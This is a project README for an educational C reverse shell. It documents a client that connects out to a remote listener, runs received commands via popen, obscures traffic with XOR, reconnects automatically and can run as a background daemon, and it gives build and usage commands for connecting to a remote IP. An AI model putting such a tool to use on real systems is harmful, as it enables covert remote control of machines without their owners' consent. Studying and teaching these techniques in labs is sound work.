⚠️ EDUCATIONAL USE ONLY
This tool is designed exclusively for educational purposes and authorized penetration testing in controlled lab environments. Unauthorized use against systems without explicit permission is illegal and unethical.
ReverseShell-C is a full-featured educational reverse shell implementation in C, designed to demonstrate core cybersecurity concepts including:
- Network Programming: TCP client-server architecture using POSIX sockets
- Encryption: XOR-based encryption for command and output obfuscation
- Process Execution: Safe command execution with output capture
- Persistence: Automatic reconnection logic with configurable retry delays
- Stealth: Linux daemon mode for background operation
This project is structured as a portfolio-ready open-source educational tool, perfect for learning red-team techniques in authorized lab environments.
┌─────────────┐ ┌─────────────┐
│ Server │ │ Client │
│ (Attacker) │ │ (Target) │
└──────┬──────┘ └──────┬──────┘
│ │
│ 1. Client initiates connection │
│◄─────────────────────────────────┤
│ │
│ 2. Server sends encrypted cmd │
├─────────────────────────────────►│
│ │
│ │ 3. Execute command
│ │ (popen)
│ │
│ 4. Client sends encrypted output│
│◄─────────────────────────────────┤
│ │
│ 5. Server decrypts & displays │
│ │
All data transmitted between client and server is encrypted using XOR encryption:
- Commands: Server encrypts before sending
- Output: Client encrypts before returning
- Key: Configurable in
common/crypto.h(default:0xAA)
Note: XOR encryption is used for educational purposes only. It is not cryptographically secure for production use.
ReverseShell-C/
├── server/
│ ├── server.c # Server implementation
│ └── Makefile # Server build configuration
├── client/
│ ├── client.c # Client implementation
│ └── Makefile # Client build configuration
├── common/
│ ├── crypto.h # Encryption header
│ └── crypto.c # Encryption implementation
├── docs/
│ ├── architecture.md # Detailed architecture documentation
│ └── usage.md # Usage guide and examples
├── README.md # This file
└── LICENSE # MIT License
- ✅ TCP socket listener on configurable port
- ✅ Interactive command shell interface
- ✅ Automatic encryption of outgoing commands
- ✅ Automatic decryption of incoming output
- ✅ Graceful client disconnect handling
- ✅ Sequential client session support
- ✅ Outbound TCP connection to server
- ✅ Automatic reconnection with configurable delay (default: 5 seconds)
- ✅ Command execution via
popen()(captures stdout + stderr) - ✅ Automatic encryption of command output
- ✅ Linux daemon mode for background operation
- ✅ Clean error handling and resource cleanup
- Operating System: Linux (tested on Ubuntu/Debian)
- Compiler: GCC with C99 support
- Libraries: Standard POSIX libraries (no external dependencies)
cd server
makecd client
makecd server && make && cd ../client && make && cd ..cd server && make debug
cd client && make debugcd server && make release
cd client && make releasecd server && make clean
cd client && make clean./server/server [port]Example:
./server/server 4444The server will listen on the specified port (default: 4444) and wait for client connections.
./client/client <server_ip> [port] [-d]Examples:
# Connect to local server
./client/client 127.0.0.1 4444
# Connect to remote server
./client/client 192.168.1.100 4444
# Run in daemon mode (background)
./client/client 192.168.1.100 4444 -dOnce connected, type commands in the server terminal:
shell> whoami
shell> pwd
shell> ls -la
shell> exit # Disconnect client
Edit common/crypto.h:
#define ENCRYPTION_KEY 0xAA // Change to any byte valueThen rebuild both server and client.
Edit source files or pass port as command-line argument.
Edit client/client.c:
#define RETRY_DELAY 5 // Change to desired secondsThis project demonstrates:
- Network Programming: TCP socket creation, binding, listening, connecting
- Encryption Basics: XOR encryption/decryption implementation
- Process Management: Command execution, output capture, daemon processes
- Error Handling: Robust error checking and resource cleanup
- Security Concepts: Reverse shells, encrypted communication, persistence
This tool is for educational and authorized lab use only.
- ✅ Authorized Use: Penetration testing in your own lab environment
- ✅ Authorized Use: Educational research with proper permissions
- ✅ Authorized Use: Red team exercises with written authorization
- ❌ Unauthorized Use: Running against systems without explicit permission
- ❌ Unauthorized Use: Malicious activities or illegal hacking
Unauthorized access to computer systems is illegal under laws including the Computer Fraud and Abuse Act (CFAA) and similar legislation worldwide.
- XOR Encryption: Not cryptographically secure; easily broken
- No Authentication: Server accepts any client connection
- No Integrity Checks: Data can be tampered with in transit
- Command Injection: Server has full command execution privileges
This tool is intentionally simplified for educational purposes. Do not use in production environments.
For more detailed information, see:
- Architecture Documentation: Detailed system design and workflow
- Usage Guide: Comprehensive usage examples and troubleshooting
This project is licensed under the MIT License - see the LICENSE file for details.
Created as an educational resource for learning cybersecurity concepts in authorized lab environments.
Vision KC
Remember: With great power comes great responsibility. Use this knowledge ethically and legally.